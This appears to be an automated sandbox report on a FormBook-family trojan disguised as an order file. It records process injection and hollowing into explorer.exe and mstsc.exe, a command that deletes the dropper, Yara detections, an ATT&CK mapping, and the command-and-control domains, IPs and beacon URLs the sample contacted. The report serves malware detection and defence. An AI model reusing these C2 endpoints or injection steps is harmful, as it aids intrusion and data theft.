          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADC600 mov eax, dword ptr fs:[00000030h]3_2_04ADC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B08E00 mov eax, dword ptr fs:[00000030h]3_2_04B08E00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91608 mov eax, dword ptr fs:[00000030h]3_2_04B91608
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF3A1C mov eax, dword ptr fs:[00000030h]3_2_04AF3A1C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADAA16 mov eax, dword ptr fs:[00000030h]3_2_04ADAA16
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADAA16 mov eax, dword ptr fs:[00000030h]3_2_04ADAA16
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD5210 mov eax, dword ptr fs:[00000030h]3_2_04AD5210
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD5210 mov ecx, dword ptr fs:[00000030h]3_2_04AD5210
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD5210 mov eax, dword ptr fs:[00000030h]3_2_04AD5210
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD5210 mov eax, dword ptr fs:[00000030h]3_2_04AD5210
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE766D mov eax, dword ptr fs:[00000030h]3_2_04AE766D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1927A mov eax, dword ptr fs:[00000030h]3_2_04B1927A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8B260 mov eax, dword ptr fs:[00000030h]3_2_04B8B260
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8B260 mov eax, dword ptr fs:[00000030h]3_2_04B8B260
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8A62 mov eax, dword ptr fs:[00000030h]3_2_04BA8A62
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]3_2_04AFAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]3_2_04AFAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]3_2_04AFAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]3_2_04AFAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]3_2_04AFAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B64257 mov eax, dword ptr fs:[00000030h]3_2_04B64257
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9EA55 mov eax, dword ptr fs:[00000030h]3_2_04B9EA55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9240 mov eax, dword ptr fs:[00000030h]3_2_04AD9240
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9240 mov eax, dword ptr fs:[00000030h]3_2_04AD9240
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9240 mov eax, dword ptr fs:[00000030h]3_2_04AD9240
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9240 mov eax, dword ptr fs:[00000030h]3_2_04AD9240
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]3_2_04AE7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]3_2_04AE7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]3_2_04AE7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]3_2_04AE7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]3_2_04AE7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]3_2_04AE7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9AE44 mov eax, dword ptr fs:[00000030h]3_2_04B9AE44
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9AE44 mov eax, dword ptr fs:[00000030h]3_2_04B9AE44
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04BAD mov eax, dword ptr fs:[00000030h]3_2_04B04BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04BAD mov eax, dword ptr fs:[00000030h]3_2_04B04BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04BAD mov eax, dword ptr fs:[00000030h]3_2_04B04BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA5BA5 mov eax, dword ptr fs:[00000030h]3_2_04BA5BA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0B390 mov eax, dword ptr fs:[00000030h]3_2_04B0B390
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE1B8F mov eax, dword ptr fs:[00000030h]3_2_04AE1B8F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE1B8F mov eax, dword ptr fs:[00000030h]3_2_04AE1B8F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57794 mov eax, dword ptr fs:[00000030h]3_2_04B57794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57794 mov eax, dword ptr fs:[00000030h]3_2_04B57794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57794 mov eax, dword ptr fs:[00000030h]3_2_04B57794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02397 mov eax, dword ptr fs:[00000030h]3_2_04B02397
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9138A mov eax, dword ptr fs:[00000030h]3_2_04B9138A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8D380 mov ecx, dword ptr fs:[00000030h]3_2_04B8D380
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE8794 mov eax, dword ptr fs:[00000030h]3_2_04AE8794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B137F5 mov eax, dword ptr fs:[00000030h]3_2_04B137F5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFDBE9 mov eax, dword ptr fs:[00000030h]3_2_04AFDBE9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.shadyshainarae.com
          Source: C:\Windows\explorer.exeDomain query: www.xn--80aasvjfhla.xn--p1acf
          Source: C:\Windows\explorer.exeNetwork Connect: 107.164.93.172 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tjanyancha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.62.63 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.pocopage.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.130 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.goodcreditcardshome.info
          Source: C:\Windows\explorer.exeDomain query: www.paperplaneexplorer.com
          Source: C:\Windows\explorer.exeDomain query: www.usapersonalshopper.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.164.26.246 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dmowang.com
          Source: C:\Windows\explorer.exeDomain query: www.comicstattoosnguns.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.219.49.238 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thefrankversion.com
          Source: C:\Windows\explorer.exeDomain query: www.pasteleriaruth.com
          Source: C:\Windows\explorer.exeDomain query: www.goeseo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeMemory written: C:\Users\user\Desktop\Order 122001-220 guanzo.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 9D0000Jump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000002.931217061.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Users\user\Desktop\Order 122001-220 guanzo.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412023 Sample: Order 122001-220 guanzo.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.amesshop.com 2->31 33 amesshop.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 8 other signatures 2->47 11 Order 122001-220 guanzo.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\...\Order 122001-220 guanzo.exe.log, ASCII 11->29 dropped 57 Injects a PE file into a foreign processes 11->57 15 Order 122001-220 guanzo.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 35 pasteleriaruth.com 162.241.62.63, 49729, 80 UNIFIEDLAYER-AS-1US United States 18->35 37 www.dmowang.com 104.164.26.246, 49726, 80 EGIHOSTINGUS United States 18->37 39 15 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 mstsc.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Order 122001-220 guanzo.exe63%VirustotalBrowse
          Order 122001-220 guanzo.exe35%MetadefenderBrowse
          Order 122001-220 guanzo.exe66%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          Order 122001-220 guanzo.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.Order 122001-220 guanzo.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.dmowang.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.comicstattoosnguns.com/meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre0%Avira URL Cloudsafe
          http://www.amesshop.com/meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox0%Avira URL Cloudsafe
          http://www.thefrankversion.com/meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.pocopage.com/meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7S0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.shadyshainarae.com/meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.dmowang.com/meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.tjanyancha.com/meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA0%Avira URL Cloudsafe
          http://www.goodcreditcardshome.info/meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.searchvity.com/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays50%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.goeseo.com/meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          www.uuoouu-90.store/meub/0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thefrankversion.com
          		34.102.136.180
          		truefalse
            		unknown
            amesshop.com
            		34.102.136.180
            		truefalse
              		unknown
              www.dmowang.com
              		104.164.26.246
              		truetrueunknown
              parkingpage.namecheap.com
              		198.54.117.216
              		truefalse
                		high
                comicstattoosnguns.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.tjanyancha.com
                  		107.164.93.172
                  		truetrue
                    		unknown
                    shadyshainarae.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      www.goodcreditcardshome.info
                      		18.219.49.238
                      		truetrue
                        		unknown
                        www.goeseo.com
                        		66.96.162.130
                        		truetrue
                          		unknown
                          pasteleriaruth.com
                          		162.241.62.63
                          		truetrue
                            		unknown
                            www.shadyshainarae.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.xn--80aasvjfhla.xn--p1acf
                              		unknown
                              		unknowntrue
                                		unknown
                                www.pocopage.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.amesshop.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.paperplaneexplorer.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.usapersonalshopper.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.comicstattoosnguns.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.thefrankversion.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.pasteleriaruth.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.comicstattoosnguns.com/meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXrefalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.amesshop.com/meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLjfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Oxtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.thefrankversion.com/meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLjfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.pocopage.com/meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLjtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.shadyshainarae.com/meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nibfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dmowang.com/meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLjtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tjanyancha.com/meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWAtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goodcreditcardshome.info/meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLjtrue
                                              • Avira URL Cloud: safe
                                              		unknown
